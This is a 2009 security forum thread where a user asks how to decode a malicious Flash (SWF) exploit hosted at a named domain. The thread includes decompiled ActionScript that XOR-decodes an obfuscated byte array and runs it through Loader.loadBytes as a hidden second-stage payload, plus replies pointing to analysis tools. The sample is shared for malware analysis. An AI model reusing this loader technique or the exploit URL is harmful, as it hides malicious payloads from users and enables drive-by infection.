Author Topic: Some help with this=/  (Read 4004 times)

0 Members and 1 Guest are viewing this topic.

November 12, 2009, 11:24:52 pm
Read 4004 times

Crown

  • Newbie

  • Offline
  • *

  • 2
This is swf exploit from here
Code: [Select]
stats.adversting-media.com/fiveDummy.swfHow to decode it?!
Thnx for your answers.....

November 13, 2009, 06:40:00 pm
Reply #1

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
You need a flash decompiler.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

November 13, 2009, 09:50:21 pm
Reply #2

Crown

  • Newbie

  • Offline
  • *

  • 2
Yes i have got  script from it ..........
Code: [Select]
package
{
    import fiveDummy.*;
    import flash.display.*;
    import flash.events.*;
    import flash.utils.*;

    public class fiveDummy extends Sprite
    {

        public function fiveDummy()
        {
            var oneBookBook:Loader;
            var myarray1:* = new Array();
            myarray1[2943] = 123;
            myarray1[4385] = 144;
            myarray1[1917] = 102;
            myarray1[1699] = 178;
            myarray1[9575] = 166;
            myarray1[5403] = 132;
            myarray1[9647] = 180;
            myarray1[1218] = 112;
            myarray1[9930] = 165;
            myarray1[3027] = 228;
            myarray1[7616] = 203;
            myarray1[6655] = 254;
            myarray1[7139] = 149;
            myarray1[3030] = 183;
            myarray1[1690] = 26;
            myarray1[10240] = 28;
            myarray1[10266] = 23;
            myarray1[388] = 121;
            myarray1[7028] = 220;
            myarray1[7804] = 24;
            myarray1[5366] = 170;
            myarray1[599] = 33;
            myarray1[3412] = 32;
            myarray1[292] = 239;
            myarray1[3735] = 198;
            myarray1[6150] = 74;
            myarray1[238] = 237;
            myarray1[9079] = 176;
            myarray1[9525] = 63;
            myarray1[3614] = 225;
            myarray1[6156] = 104;
            myarray1[7870] = 173;
            myarray1[8657] = 166;
            myarray1[5786] = 194;
            myarray1[9364] = 8;
            myarray1[6873] = 254;
            myarray1[6926] = 26;
            myarray1[2538] = 237;
            myarray1[5571] = 64;
            myarray1[7586] = 150;
            myarray1[8113] = 25;
            myarray1[7462] = 20;
            myarray1[7976] = 148;
            myarray1[3011] = 54;
            myarray1[8762] = 119;
            myarray1[3180] = 26;
            myarray1[179] = 19;
            myarray1[1362] = 212;
            myarray1[10087] = 52;
            myarray1[10223] = 20;
            myarray1[3525] = 128;
            myarray1[9239] = 56;
            myarray1[538] = 25;
            myarray1[9374] = 194;
            myarray1[2027] = 39;
            myarray1[2359] = 92;
            myarray1[997] = 133;
            myarray1[6324] = 4;
            myarray1[739] = 12;
            myarray1[4089] = 217;
            myarray1[749] = 83;
            myarray1[8439] = 77;
            myarray1[3124] = 197;
            myarray1[9493] = 124;
            myarray1[5909] = 33;
            myarray1[2892] = 125;
            myarray1[3468] = 86;
            myarray1[7518] = 213;
            myarray1[7457] = 10;
            myarray1[3767] = 160;
            myarray1[4370] = 69;
            myarray1[8284] = 8;
            myarray1[5887] = 33;
            myarray1[6525] = 237;
            myarray1[957] = 71;
            myarray1[8108] = 203;
            myarray1[5423] = 41;
            myarray1[8354] = 84;
            myarray1[8128] = 2;
            myarray1[5504] = 78;
            myarray1[2908] = 55;
            myarray1[9724] = 22;
            myarray1[10098] = 82;
            myarray1[1095] = 233;
            myarray1[688] = 49;
            myarray1[1487] = 81;
            myarray1[10046] = 229;
            myarray1[6232] = 102;
            myarray1[6601] = 141;
            myarray1[2081] = 132;
            myarray1[7366] = 163;
            myarray1[6437] = 195;
            myarray1[5242] = 131;
            myarray1[10161] = 205;
            myarray1[2616] = 230;
            myarray1[1930] = 199;
            myarray1[4073] = 185;
            myarray1[4553] = 183;
            myarray1[9189] = 19;
            myarray1[10033] = 181;
            myarray1[7609] = 193;
            myarray1[2343] = 162;
            myarray1[9346] = 30;
            myarray1[2342] = 18;
            myarray1[9155] = 218;
            myarray1[9704] = 250;
            myarray1[5003] = 66;
            myarray1[6472] = 160;
            myarray1[6786] = 125;
            myarray1[8024] = 147;
            myarray1[8423] = 81;
            myarray1[66] = 245;
            myarray1[4524] = 84;
            myarray1[5389] = 109;
            myarray1[9600] = 189;
            myarray1[1249] = 81;
            myarray1[4335] = 232;
            myarray1[329] = 170;
            myarray1[2594] = 189;
            myarray1[7697] = 159;
            myarray1[9106] = 4;
            myarray1[8492] = 95;
            myarray1[4674] = 107;
            myarray1[10] = 143;
            myarray1[1793] = 55;
            myarray1[8886] = 104;
            myarray1[6576] = 189;
            myarray1[7998] = 60;
            myarray1[779] = 177;
            myarray1[10112] = 54;
            myarray1[6251] = 2;
            myarray1[4365] = 120;
            myarray1[2553] = 144;
            myarray1[6791] = 49;
            myarray1[9911] = 229;
            myarray1[3913] = 32;
            myarray1[637] = 131;
            myarray1[5578] = 78;
            myarray1[195] = 66;
            myarray1[4521] = 234;
            myarray1[3837] = 113;
            myarray1[5284] = 244;
            myarray1[3933] = 87;
            myarray1[7011] = 23;
            myarray1[10208] = 241;
            myarray1[4702] = 160;
            myarray1[9358] = 206;
            myarray1[6607] = 46;
            myarray1[6145] = 150;
            myarray1[1080] = 130;
            myarray1[9707] = 182;
            myarray1[1914] = 167;
            myarray1[5756] = 26;
            myarray1[3398] = 138;
            myarray1[6467] = 6;
            myarray1[8478] = 219;
            myarray1[7807] = 185;
            myarray1[852] = 149;
            myarray1[1550] = 97;
            myarray1[4503] = 62;
            myarray1[5775] = 101;
            myarray1[10286] = 166;
            myarray1[849] = 89;
            myarray1[7120] = 202;
            myarray1[8940] = 3;
            myarray1[8924] = 202;
            myarray1[8329] = 45;
            myarray1[5919] = 17;
            myarray1[563] = 121;
            myarray1[5807] = 150;
            myarray1[7764] = 64;
            myarray1[5889] = 63;
            ......
            var isntMiddleIf:* = new ByteArray();
            var theReaderHumour:Number;
            var forDolorInto:String;
            var i:Number;
            while (i < myarray1.length)
            {
                
                var _loc_2:* = forDolorInto;
                theReaderHumour = theReaderHumour++;
                isntMiddleIf[i] = myarray1[i] ^ _loc_2.forDolorInto["charCodeAt"](theReaderHumour);
                if (theReaderHumour >= forDolorInto.length)
                {
                    theReaderHumour;
                }
                i = i++;
            }
            oneBookBook = new Loader();
            addChild(oneBookBook);
            try
            {
                var _loc_2:* = oneBookBook["loaderInfo"];
                _loc_2.oneBookBook["loaderInfo"]["addEventListener"](Event.COMPLETE, function (event:Event) : void
            {
                loremTextOld(event, oneBookBook);
                return;
            }// end function
            );
                var _loc_2:* = oneBookBook;
                _loc_2.oneBookBook["loadBytes"](isntMiddleIf);
            }
            catch (e:Error)
            {
                trace(e);
            }
            return;
        }// end function

        private function loremTextOld(event:Event, C:\Users\BotMaster\Desktop\Builder;;fiveDummy.as:Loader) : void
        {
            trace(event);
            return;
        }// end function

    }
}
I think at first I must decode myarray[] ,but how?I don't know what to do next ....
 

November 13, 2009, 10:05:48 pm
Reply #3

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Ordinarily I'd advise using Malzilla, but given it's ActionScript and note Javascript, you may want to try running it through Wepawet (using the flash option). I can't for the life of me, remember the flash/actionscript analyzers atm (one of those days I think)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

November 17, 2009, 08:37:51 pm
Reply #4

d3t0n4t0r

  • Jr. Member

  • Offline
  • **

  • 13

November 19, 2009, 09:48:36 am
Reply #5

parody

  • Private Forum
  • Jr. Member

  • Offline
  • *

  • 27